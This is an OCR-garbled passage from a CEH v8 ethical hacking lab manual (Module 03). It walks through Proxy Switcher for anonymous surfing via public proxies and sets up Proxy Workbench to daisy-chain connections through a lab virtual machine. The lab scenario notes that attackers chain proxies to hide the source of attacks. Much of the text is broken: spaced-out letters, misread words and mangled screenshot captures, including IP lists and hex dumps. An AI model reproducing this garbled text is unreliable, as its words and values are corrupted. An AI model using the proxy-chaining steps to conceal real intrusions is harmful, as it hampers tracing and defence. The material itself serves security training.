Cancel DsajleJ Keep Ali/e Auto Swtcf‫־‬

108 21.5969:18221 tested 09 (Deod) becousc ccrreoon bmed out 2 ' 3.86.4.103.80 tested as [Deod] because connection lifted 0U 123.30.188.46:2214 tested as [Dead] Decause ccnrecaon tuned out. 68 134253.197 5563tested as [Dead] because connection •jmed out.

V

F IG U R E 1 21 0: C lic k o n S ta rt b u tto n

1 5 . C lic k

Basic Anonymity i n

d ie r i g h t p a n e l; i t s h o w s a lis t o f d o w n lo a d e d

p r o x y s e rv e rs .

C E H Lab M anual Page 206

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Switcher Unregistered ( Direct Connection)
File Edit A ctions View Help

| _ ; o ^

£z‫ ־‬W hen running in A u t o S w i t c h m ode Proxy S w itc h e r w ill s w itc h a c tiv e proxy servers regularly. S w itc h in g period can be s e t w ith a s lid e r fro m 5 m inu te s to 1 0 seconds

& s ►□

x

Ia a a
Server , f 91 14444 65 3128 <f 119252.170.34:80.. , f 114110*4.353128 f 41 164.142.154:3123 ,f 2‫כי‬149101 10? 3128 , f 2D3 66 4* 28C , f 203 254 223 54 8080 <f 200253146.5 8080 <f 199231 211 1078080 , f 1376315.61:3128 i f 136233.112.23128 < State (Alve-SSU (Aive-SSU (Alve-SSL) (Alve-SSU Alve Alvo (Alve-SSL) Alve (Alve-SSU (Alve-SSU (Alve-SSU ■ 1 RespxKe 10160ns 59/2rre 10705ns 12035ns 11206ns 10635n • 11037ns 10790ns 10974m 10892m 11115ns Countiy — Sv RAfi ARAB REPUBI INDONESIA ^ INDONESIA ► )E SOUTH AFRICA m BRAZIL H iT A IV /A M REPUBLIC OF KOREA BRAZIL

K

g? Proxy Scanner j ~ # New (853) B ‫&־‬ Anonymous (0) h & SSL(0) Bte(0) ■ ‫ »־‬-& Dead (2872) Femanently (6925)

1513 ■
\ —

'‫‘י‬.. . " < <1 ‫־"׳‬

Pnvale (16) ;—£5 Danoerous (696) \ & My Proxy Sorvoro (0) -■‫־‬ ProxySwltcher (0)

pg

1

gq b razil ‫ נ ס‬brazil
Caned

Cis^bled

Keep Alive

AUd Swtd‫־‬

177 38.179.26 80 tested as [Alwe! 17738.179.26:80 tested as [(Aive-SSU] 119252.170.34:80 tested a< (Alive]
119252.170.34.80 tested as [(Alive-SSL)]

IS illi& S S itS iS k

33/32

F IG U R E 1211: S e le ctin g d o w n lo a d e d P ro x y se rve r fro m B a s ic A n o n y m ity

1 6 . S e le c t o n e

Proxy server IP address

f r o m r i g h t p a n e l t o s w i c h d i e s e le c t e d

p r o x y s e rv e r, a n d c lic k d ie
f lit a (3 File Edit ,Actions View Help

fTJ

ic o n .
1~ l~a ! *

P ro x y S w itc h e r U n r e g is te r e d ( D ir e c t C o n n e c tio n )

3 # ‫ □ ׳‬n [a a. a a if j \
Server J• • •‫ * ל‬New )766(

2 \y
State (Alve-SSU (Alve-SSL (Alve-SSU Alh/e (Alve-SSU (Alve-SSL:• (Alve-SSU (Alve-SSU (Alve-SSU (Alve-SSL) (Alve-SSU (AlveSSU (Alve-SSU

A

L is |

‫י‬/ |

Proxy S«rvera

|X j

Px»y Scanner £5

rtgh Anonymous )0( & SSL)0<

; ‫־־‬B 1 te 0 1 )0 (
& } ‫ ־‬: Dead )2381(
^

f ,9 1 .1 4 4 4 4 .6 5 :3 1 2 3 ,.f 0 0 1 .1 4 7 .4 8 .1U .ctabcrct lx > s tS 4 1 5 9?, ‫ל־‬1 & ‫־‬ . a e m e f.9 5 f ,2 1 8 .1 5 2 .1 2 1 .1 8 4 :3 0 3 0
95.110159.545080
3 i.5 6 .2 ‫־‬S.2-i.8GS:)..

In a d d itio n to sta n d a rd

.......... Pemanently

)6925(

a d d / re m o v e / e d it fu n c tio n s p ro x y m a n a g e r c o n ta in s fu n c tio n s u s e fu l fo r a n o n y m o u s s u rfin g an d p ro x y a v a ila b ility te s tin g

Basic Anonymity )467'

h ‫ & ־‬Pn‫ ׳‬ate 116( j‫ & ־ ־‬Dangerous )696!‫׳‬ r ‫&־‬ Proxy Ser/ere )0( :— ProxySvtitcher )0(

if 9 5 .2 1 1 1 5 2 .2 1 8 :3 1 2 3 f u 5 4 jp j1 1 3 5 a T T S jn oc o Jc r :• ,f 9 1 .8 2 .6 5 .1 7 3 :8 0 8 0 <f 8 6 .1 1 1 1 A 4 .T 9 4 .3 1 2 3
$

,f 9‫ ו‬1 4 4 4 48 63 1 2 3

4 ‫ד‬.89.130.23128

He>ponte 10159ms 131 5‫־‬m 10154TBS 10436ns 13556ns n123me 10741ns 10233ns 10955ns 11251m 10931ns 15810ns 10154ns

Lointiy “ SYRIAN ARAB REPUBLIC [ J HONG KONG 1 | ITALY REPUBLIC OF IQOREA ;-S W E D E N 1 ITALY ------NETHERLANDS REPUBLIC OF KOREA “ HUNGARY ^ ^ IR A C S3£5 KENYA “ SYRAN ARAB REPUBLIC

Ctaeblcd

[[

Koep Alive

][ Auto Swtch |

2 1 8 .1 5 2 .1 2 1 .1 8 4 :8 0 3 0 h a *» 5 4 -1 5 9 -l 1 0 -9 5s e n ie rie d ie a tia m b ait 8080te**d» ( ‫׳‬A lv e -S S L )] 0 3 1 .1 4 7 .4 8 .1K > .« a tb .n e t/ig 3 to r.c o m :3 1 2 3te a ts d0 5[(A S v eS S L )]

218 152. 121.I84:8030tested as ((Alve-SSL:] tested as [Alive]

P‫־‬ ‫׳‬

F IG U R E 1 2 1 2 S e le ctin g th e p ro x y se rve r

1 7 . T h e s e le c t e d

pro xy se rve r w

ill c o n n e c t, a n d i t w ill s h o w d ie f o llo w in g

c o n n e c t io n ic o n .

C E H Lab M anual Page 207

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Switcher Unregistered ( Active Proxy: 95.110.159.54:8030 ‫ ־‬ITALY)
pF File ik Edit Actions View Help

I~ l‫ ם‬f x

$5 Proxy Scanner

H * New !766) Ugh Anonymous (0) • g t SSL(O) H 2 ? a te (0» B - R Dead (2381) P»m*n#ntly (G975) • f y 003‫״‬. Anonymity (4G7) Pnvate (16) | 0 ‫ ־־‬Dangerous (6961‫׳‬ l‫ & ״‬My Proxy Servere (0) :—ProxySviitcha 25 ‫) ־‬0(

Serve! ^ 9 1 .1 4 4 4 4 65:3123 001.147.48. ilS.etatic .re t.. , ? host54-159-110-95.server.. & 218.152.121.1(4:3080 , f dedserr2i23Jevonlme to n L 95 110159 54 8080
, ? 95 211 152 21( 3128

u54aDJl133a‫׳‬r»unfl,co.kr:l
, f 91 82 £5 173:8080 g £ >I

86.111 144.194.3128 91 14444 86 3123 ‫״י‬

, ? 41.89.130^3128

State (Alve-SSU (Alve-SSU (Alve-SSU Alive (Alve-SSU (Alve-SSU (Alve-SSU (Alve-SSU (Alve-SSU (AlveSSU (Alve-SSU (Alve-SSU (Alve-SSU

Response 10159ms 13115n* 10154ns 10436ms 13556ms 11123™• 10740ms 10233ms 10955ms 1l251r»a 10931ms 158101s 10154ns

Comtiy SYRAN ARAB REPUBLIC [ J HONG KONG | |IT A LY > : REPJBLIC OF KOREA ■■SW ED EN I ITA tr UNI ILL) ARAD CMIRATCS “ NETHERLANDS REP JBLIC OF KOREA “ HUNGARY “ IRAG g g K E N rA “ SYRIAN ARAB REPUBLIC “

Dsebicd

1 1 Keep Alive

|[" Auto Switch

2l8.152.121.1&4:8030tested as [fAlve-SSL! 218.152.121.184:8030tested as (Alive]
host54-159-110-95 9»rverdedicati arnba 8080 ‫ ג‬tested as RAIve-SSL)] 031.147.48.116.atotc.nctvigator.con>:3123tested09 [(Mrvc SSL))
E a u c An on ym ity

ML
F IG U R E 1213: S u c c e s fiil c o n n e c tio n o f selected p ro x y

£□ S ta rtin g from version 3.0 Proxy S w itc h e r in co rp o ra te s in te rn a l pro xy server. It is useful w hen you w a n t to use o th e r a p p lic a tio n s (besides In te rn e t E xplorer) th a t s u p p o rt HTTP p ro xy v ia Proxy S w itc h e r. By d e fa u lt it w a its fo r c o n n e c tio n s on localhost:3 128

18. G o to a

w e b b ro w se r

( F ir e fo x ) , a n d ty p e d ie f o llo w in g U R L

h t t p : / / w ^ v . p r o x y s w i t c h e r , c o m / c h e c L p h p t o c h e c k d i e s e le c t e d p r o x y s e r v e r c o m i e t i v i t y ; i f i t i s s u c c e s s f u l l y c o n n c t e d , t h e n i t s h o w 's d i e f o l l o w i n g fig u r e .
Detecting your location
3? £ri!t ¥"■'‫״‬ ' History BookmorH Iool*• Jjdp 0*r»<ring your kxatkm..

M07illa Firefox

r 1 0‫ ־‬C x 1

4‫ ־‬. I UU-..J.UU,I

C * ‘I

Go®,I.

f i

f!

Your possible IP address is: Location:

2 0 2 .5 3 .1 1 .1 3 0 , 1 9 2 .1 6 8 .1 .1 U nknow n

Proxy Inform ation Proxy Server: Proxy IP: Proxy Country: DFTFCTFD 95.110.159.67 Unknown

F IG U R E 121 4: D e te c te d P ro x y se rve r

19. O p e n a n o th e r ta b i n d ie p ro x y .

w eb brow ser,

a n d s u r f a n o n y m o s ly u s in g d iis

C E H Lab M anual Page 208

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

proxy server

Cerca con G oogle - Mozilla Fiiefox

rlc Edit yie* Histoiy Bookmark: Tools Udp Ottecbngyour location..
^ *Tu

| pray ic ‫־‬.« -C e r a con Google
C U tao ‫ ־‬Gccgie

< 9wvwv gcogk.it ?hbft&g5_nf=1&pq-proxy 5wt*cr&cp^ 0&g?_<l-22t51.1t>f-taq-pro>fy‫־‬ »scrvcr&pt-p8b1»Ricerca Immagini Maps Play YouTube Mews Gmail Document! Calendar

P

*

G o o g le
03 A fte r th e an o n ym o u s

proxy server

p ro x y se rve rs h ave b eco m e ava ila b le fo r sw itc h in g yo u c a n a ctiv a te a n y o n e to b e co m e in v is ib le fo r th e sites y o u v isit.

Ricerca
Proxy Wikipodia
Im m agin■ Maps Video
it.wkj ped a.org/tv k • Pioxy

In informatica e telecomunica^ow un proxy 6 un programma che si mleipone tra un client ed un server farendo da trainee o neerfaccia tra 1 due host owero ... Alt/i usi del termrne Proxy Pioxy HTTP Note Voo correlate

1

11

N o o s e
Shopping
Ptu contanuti

Public Proxy Servers - Free Proxy Server List
ivwiv publicpfoxyserveis conV Tiacua questa pagina Public Proxy Server* is a free and *!dependent proxy checking system. Our service helps you to protect your Ktently and bypass surfing restrictions since 2002. Proxy Servers -Sored By Rating -Proxy Servers Sorted By Country -Useful Links

Proxy Server - Pest Secure, rree. Online Proxy
ItaHa Camtm localit.l

wvwproxyserver com‫• '׳‬Traduci questa pagma Tho boet fin‫ ״‬Pioxy Sarvef out there* Slop soarching a proxy list for pioxies that are never fa»1 or do noi even get onl«1e Proxy Server com has you covered from ...

Proxoit Cuida alia naviaazione anonima

I proxy server

F IG U R E 1214: S u r f u sin g P ro x y se rve r

L a b

A n a ly s is

D o c u m e n t a ll d ie

IP addresses o f live (SSL) proxy servers

a n d th e c o n n e c tiv ity

y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility

In f o r m a tio n

C o lle c t e d / O b je c t iv e s A c h ie v e d

S e r v e r : L i s t o f a v a ila b le P r o x y s e r v e r s S e le c te d P r o x y S e r v e r I P P r o x y S w it c h e r S e le c te d P r o x y C o u n t r y N a m e : I T A L Y R e s u lte d P r o x y s e r v e r I P A d d r e s s : 9 5 .1 1 0 .1 5 9 .6 7 A d d r e s s : 9 5 .1 1 0 .1 5 9 .5 4

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U

H A V E

Q U E S T I O N S

R E L A T E D

L A B .

Q u e s t io n s
1. 2. E x a m in e w h i c h te c h n o lo g ie s a re u s e d f o r P r o x y S w it c h e r . E v a lu a t e w h y P r o x y S w it c h e r is n o t o p e n s o u r c e .

C E H Lab M anual Page 209

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

In t e r n e t C o n n e c tio n R e q u ir e d 0 Y es S u p p o rte d □ iL a b s □ N o

P la tfo r m 0

C la s s r o o m

C E H Lab M anual Page 210

Eth ica l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab w
1 i 3

D aisy Chaining using Proxy W orkbench
Proxy Workbench is a uniquep/vxy server, idealfor developers, security experts, a n d twiners, which displays data in real time.
I C O N 2 3 ‫ ־‬V a lu a b le
in fo r m a tio n

K E Y

L a b

S c e n a r io
to

Y o u h a v e le a r n e d i n d ie p r e v io u s la b h o w S w it c h e r a n d b ro w s e som eone bank

h id e y o u r a c tu a l IP
and

u s in g a P r o x y in te n t lik e

a n o n y m o u s ly . S im ila r ly a n a tta c k e r w i t h e ls e u s in g a p ro x y s e rv e r by

m a lic io u s

Test your k n o w le d g e

can

pose

as

g a th e r in fo r m a t io n

account o r O nce

d e ta ils

o f an

in d iv id u a l

p e r fo r m in g he o r she

s o c ia l e n g in e e rin g .
can hack in to th a t use s o m e tim e s

‫ס‬

W e b e x e r c is e

a tta c k e r

g a in s

r e le v a n t fo r

in f o r m a t io n o n lin e

m

in d iv id u a l’s
W o r k b o o k r e v ie w

bank

account

s h o p p in g .

A tta c k e rs

m u lt ip le

p ro x y

s e rv e rs f o r s c a n n in g a n d

a tta c k in g , m a k in g i t v e r y d i f f i c u lt f o r

a d m in is tr a to r s t o tra c e d ie re a l s o u rc e o f a tta c k s . A s a n a d m i n i s t r a t o r y o u s h o u l d b e a b le t o p r e v e n t s u c h a t t a c k s b y d e p l o y i n g a n in t r u s io n d e te c tio n s y s te m w it h w h ic h y o u c a n c o lle c t n e t w o r k in f o r m a t io n a n a ly s is t o d e t e r m in e i f a n a tta c k o r in tr u s io n h a s o c c u rre d . Y o u fo r

c a n a ls o u s e

P roxy W o rk b e n c h
L a b

to u n d e rs ta n d h o w n e tw o r k s a re s c a n n e d .

O b je c t iv e s

T h is la b w i l l s h o w y o u h o w n e tw o r k s c a n b e s c a n n e d a n d h o w t o u s e P r o x y W o r k b e n c h . I t w ill te a c h y o u h o w to : ■ ■ U s e th e P r o x y W o r k b e n c h to o l D a i s y c h a i n t h e W ’i n d o w s H o s t M a c h i n e a n d V i r t u a l M a c h i n e s

L a b

E n v ir o n m e n t

T o c a r r y o u t th e la b , y o u n e e d : ■ P r o x y W o r k b e n c h is lo c a t e d a t D:\CEH-Tools\CEHv 8 M odule 03 Scanning N etw orks\P roxy Tools\Proxy W orkbench

C E H Lab M anual Page 211

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f th is lin k

P ro x y W o rk b e n c h

fro m

ZZ7 Tools d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks

h ttp ://p ro x y w o rk b e n c h .c o m

I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n t h e la b m i g h t d i f f e r A c o m p u te r r u n n in g

W indow s Server 2012

as a tta c k e r ( h o s t m a c h in e ) as

A n o t h e r c o m p u te r r u n n in g v ic tim ( v ir t u a l m a c h in e )

W indow Server 2008, and W indow s 7

A w e b b ro w s e r w ith In te rn e t access F o l l o w W iz a r d - d r iv e n in s t a lla t io n s te p s t o in s t a ll A d m i n i s t r a t i v e p r iv ile g e s t o r u n t o o ls

Proxy W orkbench

L a b

D u r a t io n

T im e : 2 0 M in u te s

O v e r v ie w

o f P ro x y W o rk b e n c h

P r o x y W o r k b e n c h is a p r o x y s e r v e r t h a t d i s p l a y s i t s d a t a i n r e a l t i m e . T h e d a t a f l o w i n g b e t w e e n w e b b r o w s e r a n d w e b s e r v e r e v e n a n a ly z e s F T P i n p a s s iv e a n d a c tiv e m o d e s .

L a b

T a s k s
I n s t a ll P r o x y W o r k b e n c h o n a ll p la t f o r m s o f d ie W in d o w s o p e r a t in g s y s te m

C S ecu rity: Proxy servers provide a level o f s e c u rity w ith in a n e tw o rk . They can help preve nt s e c u rity a tta c k s as th e only w a y in to th e n e tw o rk fro m th e In te rn e t is via th e p ro xy serve r

\

‫׳‬W indow s Server 2012. W indow s Server 2008. ‫ר‬
P r o x y W o r k b e n c h is lo c a t e d a t

and

W indow s 7)

D:\CEH-Tools\CEHv 8 M odule 03 S ca n n in g N e tw o rk s \P ro x y T o o ls \P ro x y W o rkb e n ch P roxy W o rkb e n ch
fro m

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f th is l i n k h t t p : / / p r o x y w o r k b e n c h . c o m

4.

F o llo w o f

th e w iz a r d - d r iv e n in s t a lla t io n s te p s a n d in s t a ll i t i n a ll p la t f o r m s

W in d o w s o p e ra tin g sy s te m W in d o w s S e rve r

_
T h is la b w i l l w o r k i n th e C E F I la b e n v ir o n m e n t - o n

2012, W in d o w s S e rve r 2 0 0 8 ‫י‬
6.
O p e n F ir e fo x b r o w s e r in y o u r a n d c lic k

and

W in d o w s 7
a n d g o to

W in d o w s S e rve r 2012,

T o o ls

o p tio n s

C E H Lab M anual Page 212

E th ic a l H ackin g and Counterm easures Copyright O by E C •Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Google Moiillo Fitefox
colt | HtJp Qownloatfs moderns S<* UpS^K. CW-I c m * v ‫*«״‬A

e Documents Calendar Mote •

•!1• ■ cc 9 u

fi *

♦ Yo u

Search

Images

Web Developer Page Info 5‫ «ז‬1 £ ‫ו‬1*«)‫ ז‬6 ‫ ״ ז י ה י‬9 Cle«r Recent U stsr. Cl 1+ “ Sh1 ft*IW

Sign n

G o o g le
Gocgie Search I'm feeling Lucky

AtfM«t «Mg Piogammei

11

Bumoeti SolUion*

Piracy t Te

•Google

Aboul Google

Google com

F IG U R E 13.1: F ire fo x o p tio n s tab

7.

G o

t o A dvanced N e tw o rk t a b , a n d

p r o file in d ie n c lic k

d i e O ptions Settings. Options

w i z a r d o f F i r e f o x , a n d s e le c t d i e

‫§י & ם‬
General f t T h e s o c k e ts p a n e l sh o w s th e n u m b e r o f A liv e s o c k e t c o n n e c tio n s th a t P r o x y W o r k b e n c h is m a n a g in g . D u r in g p e rio d s o f n o a c tiv ity th is w ill d ro p b a c k to z e ro S e le c t Cached Web Content Connection Tabs Content

%
Applications

p
Privacy Security

3

S>nc

Advanced

General | MetworV Update | Encryption

j

j

Configure h o * h re fo i connects to the Internet

| S g t n g i.

Your w eb content cache 5‫י‬currently using 8.7 M B of disk space I I Override a u to m ate cache m anagem ent

Clear Now

Limit cache to | 1024-9] MB of space Offline Web Content and User Data
You 1 application cache is c jiie n t l/ using 0 bytes of disk space M Tell me when a wefccite aclrt to store data fo r offline uce The follow ing websites are a lowed to store data for offline use
Clear Nov/

E x c e p tio n s ..

B a r eve..

OK

Cancel

Help

F IG U R E 13.2 F ire fo x N e tw o rk Settin g s

C E H Lab M anual Page 213

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S T he s ta tu s bar show s th e d e ta ils o f Proxy W orkbench*s a c tiv ity . The firs t panel disp lays th e a m ou nt o f data Proxy W orkbench c u rre n tly has in m em ory. The a c tu a l am o un t of m em ory th a t Proxy W orkbench is consum ing is g e n e ra lly m uch m ore th a n th is due to overhead in m anaging it.

8.
9.

C heck Type

Manual proxy c o n fig u ra tio n 111

th e

C onnection S e ttin g s

w iz a r d . check

HTTP Proxy as 127.0.0.1

a n d e n t e r d ie p o r t v a lu e as

8080‫ י‬a n d OK.

d ie o p t io n o f

Use th is proxy se rve r fo r a ll p rotocols,
Connection Settings

a n d c lic k

Configure Proxies to Access th e Internet O No prox^ O A uto-detect proxy settings for this network O ii** system proxy settings (§) Manual proxy configuration: HTTP Proxy: 127.0.0.1 @ Use this proxy server for all protocols SSL Proxy: £TP Proxy: SO£KS H ost 127.0.0.1 127.0.0.1 127.0.0.1 D SOCKS v4 No Proxy fo r (S) SOCKS ^5 Port Port PorJ: 8080— 8080y | 8080v Port

localhost, 127.0.0.1 Example .mozilla.org, .net.nz, 192.168.1.0/24

O Automatic proxy configuration URL Rgload

OK

Cancel

Help

F IG U R E 13.3: F ire fo x C o n n e c tio n Settin g s

10. W h ile c o n fig u r in g , i f y o u e n c o u n te r a n y 1 1 . L a u n c h th e

p o rt e rro r please ignore it

S ta rt

m e n u b y h o v e r in g d ie m o u s e c u r s o r i n th e lo w e r - le f t

c o r n e r o f th e d e s k to p .

S c a n c o m p u te rs b y I P ra n g e , b y d o m a in , s in g le c o m p u te rs , o r c o m p u te rs , d e fin e d b y th e G lo b a l N e tw o r k In v e n to r y h o s t file 4 W indows Server 2012 WaoomW1P iW 2 taeneCjickttr 0H iK tT r baLMcncowtuid M O .

g. - ? •
F IG U R E 13.4: W in d o w s S e rv e r 2012 - D e s k to p v ie w

1 2 . C lic k d ie

Proxy W orkbench

a p p t o o p e n d ie

Proxy W orkbench

w in d o w

C E H Lab M anual Page 214

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Server Manager

Windows PowerShell

Google Chrome

Hyper-V Manager

S

T h e e v e n ts p a n e l

Fa

m
Control Pand


HyperV Virtual Machine ‫״‬

‫וי‬
SO I Server

d is p la y s th e to ta l n u m b e r o f e v e n ts th a t P ro x y W o r k b e n c h h a s in m e m o ry . B y c le a rin g th e d a ta ( F ile ‫ > ־‬C le a r A ll D a t a ) th is w ill d e c re a s e to z e ro i f th e re a re n o c o n n e c tio n s th a t a re A liv e

W

£
Detkc

Command Prompt

MO? 1 1 3 Firefox

Searct101_

H
dobai Network Inventory

O
Proxy Woricbenu.

Si
F IG U R E 13.5: W in d o w s S e rv e r 2012 - A p p s

13. T h e

Proxy W orkbench

m a in w in d o w a p p e a rs as s h o w n i n d ie f o llo w in g

fig u r e .

Proxy Workbench
File V ie w T o o ls H e lp

H I

& The la s t panel d isp lays th e c u rre n t tim e as re ported by your o p eratin g system

‫ו ם‬

_‫עב ש‬

Monitorirg: WIND33MR5HL9E4 (10.0.0.7) SMTP • Outgoing e-mal (25) ^
&

Details for All Activity
From

K N JH
To 173.194.36.24:80 (www g . 74.125.31.106:80 (p5 4ao 173.194 36 21:443 (m aig 173.194.36.21 M 2 (m a ig . 173.194.36 21:443 (maig..
173‫ ־‬K M TC. 71 •A n (m ‫־‬d ‫״‬

m

m

1 Protocol HTTP HTTP HTTP HTTP HTTP
H T T P ____

| Started 18:23:39.3^ 18:23:59.0‫־‬ 18:24:50.6( 18:24:59.8' 18:25:08.9‫־‬
1 fi‫־‬jR - 1 fir

JJ127 .0.0.1:51199 127.0.0.1:51201 J l l 127.0.0.1:51203 J d 127.0.0.1:51205 J d 127.0.0.1:51207
W 'l! ? 7 n n 1 ‫ו לו ^ו‬

^

POP3 • Incoming e-mail (110) HTTP Proxji • Web (80B0) HTTPS Proxy • SecureWeb (443) FTP • File T!ansfer Protocol (21) Pass Through ■For Testing Apps (1000)

3eal time data for All Activity

000032 000048 000064 000080 000096 000112 000128 000144 000160 000176
< III

/I .1. . User—Agent : Mozilla/5.0 (¥ indows NT 6.2; V OU64; r v :14.0) G ecko/20100101 Fi refox/14.0.1..Pr oxy-Connection: koop-alivo. Host : mail. google. co m ....

2f 3a 69 4f 65 ?2 6f 6b 3a 6d

2e 4d 64 36 6b b5 66 73 79 65 65 20 6d Od Qa 31 20 6e 57 63

31 Od 7a 6£ 77 34 3b 6f 2f 6f 78 2d 43 70 2d 61 69 Od 0a
Si

0A 69 73 20 32 2f 6f 61 6c

SS 6c 20 72 30 31

73 6c 4e 76 31 34 60 6e 6c 69 2e 67 ,

Memory: 95 KByte Sockets: 1C O

Events: 754

u n ; 1iciu ic . u n ; 1 1

7angwrrx?n— Luyymy. u n ; .

1

>

J

F IG U R E 13.6: P ro x v W o rk b e n c h m a in w in d o w

14. G o to

T ools

o n d i e t o o l b a r , a n d s e le c t

C onfigure Ports

C E H Lab M anual Page 215

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Workbench
File L^o o ls J Help View I Save Data... 5 Monitoring: W All Activity ^ SMTF Configure Ports. Failure Simulation... Real Tim e 9‫־י‬099 ‫• ח י‬ Options...

U- 3
=tails for All Activity |10m | T0 I Protocol

m n ih m
| Started ^

J1 2 7 .0 .0 .15 1 1 9 9
tJ 127.0.0.1 51201

& The *Show th e real tim e data w in d o w ' a llo w s th e u ser to s p e c ify w h e th e r th e re al-tim e d ata pane should be displayed o r no t

POPd ^ ^

k # HTTP T ‫־־‬T W ny TTWU(WW)

HTTPS Proxy • Secure Web |443) FTP • File T ransler Protocol (21) Pass Through ■For Testing Apps (1000)

3d 1 2 7 .0 .0 .1 5 1 2 0 3 £ J1 2 7 .0 .0 .15 1 2 0 5 ; jd 1 2 7 .0 .0 .1 5 1 2 0 7 l1?7nn15‫־‬ R 1 9 1 1 >
Real time data for All Activity

1 7 3 .1 9 4 .3 6 .2 4 :8 0(w » w * .g .. HTTP 7 4 .1 2 5 .3 1 .1 0 6 :8 0|p t4 a o HTTP 1 7 3 .1 9 43 6 .2 1 :4 4 3(naig. HTTP 1 7 3 .1 9 43 6 .2 1 :4 4 3(na*g HTTP 1 7 3 .1 9 43 62 1 :4 4 3(naig HTTP 1 7 ‫׳‬n ‫־‬ * c‫־‬ ‫ל‬ ‫*ו‬ ‫״‬ n ‫ » ו*י׳ו‬H T T P

1 8 :2 3 :3 9 .3 } 1 8 :2 3 :5 9 .0 ‫־‬ 1 8 :2 4 :5 0 .6 ( 1 8 :2 4 :5 9 .8 ' 1 8 :2 5 :0 8 .9 ‫־‬
■ m - w ip r

000032 000048 000064 000080 000096 000112 000128 000144 000160 000176
Memory: 95 KByte Sockets: 100 Events: 754

/ l.1 ..User-Agent : Mozilla/5.0 (W indows N T 6.2; U O U64; rv :14.0) G ecko/20100101 Fi refox/14.0.1. Pr oxy-Connection: keep-alive..Host : mail.google.co m ....
11c1u4c. uu

2f 3a 69 4f 65 72 6f 6b 3a 6d

3 1 2e 2 04 d be 6 4 5 73 6 b 36 b 6 56 6 ?8 7 9 b 56 5 2 06 d O d 0a

3 1O d 6f 7a 6f 7 7 3 43 b 6 £ 2f 6 £7 8 2 d4 3 7 02 d 6 16 9 O d 0a

0a 6 9 ?3 2 0 3 2 2f 6f 6 1 6c

5 5 6c 2 0 7 2 3 0 3 1 6e 6c 2 e

7 3 6c 4e 7 6 3 1 3 4 6e 6 9 6 7

I eiiim a ic UII

unuuic u i i

L‫« ׳‬ty1c u n

1_<.yymy. u n

‫ ׳‬ju i

F IG U R E 13.7: P ro x y W o rk b e n c h C o n F IG U R E P o rts o p tio n

1 5 . 111 d i e

C onfigure Proxy W orkbench

w i z a r d , s e le c t

8080 HTTP P roxy - Web

i i i d ie le f t p a n e o f 16. C h e c k

P orts to lis te n on.
f p r o t o c o l a s s ig n e d t o p o r t 8 0 8 0 , a n d c l i c k

HTTP 111 d i e l i g h t p a n e o C onfigure HTTP fo r p o rt 8080

C L l P e o p le w h o b e n e fit fro m P r o x y W o rk b e n c h

Configure Proxy Workbench
Proxy Ports Ports to listen on: Protocol assigned to port 8080 ; >>Don't use

Home users w ho have taken the first step in understanding the Internet and are starting to ask "B a t how does it work?” People who are curious about how their web browser, email client or FTP client communicates w ith the Internet. People who are concerned about malicious programs sending sensitive information out in to the Internet. The inform ation that programs are sending can be readily identified. Internet software developers w ho are w riting programs to existing protocols. Software development fo r die Internet is often verv complex especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems. Internet software developers who are creating new protocols and developing the eluent and server software simultaneously. Proxy Workbench w ill help identify non-compliant protocol :- T 1 -■ > Internet Security experts w ill benefit fro m seeing the data flowing in real-time This wiH help them see w ho is doing what and when

Port [ Description 25 un SMTP • Outgoing e-mail PHP3 - lnnnmino ft-maiI HTTP Proxy ■Web HTTPS Proxy ‫ ־‬Secure Web FTP ‫ ־‬File Transfer Protocol Pass Through ■Foe Testing Apps

: ■✓
Pass Through HTTPS □ POP3 □ ‫ ח‬FTP

18080
443

21 1000

&dd-

|

Qetete

| |

Configure H T TP tor poet 8080.|

W Sho^ this screen at startup
F IG U R E 13.8: P r o s y W o rk b e n c h C o n fig u rin g H T T P fo r P o r t 8080

Close

17. T h e

HTTP P roperties
e n te r y o u r

w in d o w a p p e a rs . N o w c h e c k

C onnect via an o th e r OK

proxy,

W indow s Server 2003 8080

v ir t u a l m a c h in e I P a d d re s s i n

Proxy Server,

a n d e n te r

in P o r t a n d d ie n c lic k

C E H Lab M anual Page 216

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTP Properties
General

C (•

On the web server, connect to port: Connect via another proxy |10.0.0.7| Iftfififi

Proxy server Port:
^

M a n y p e o p le

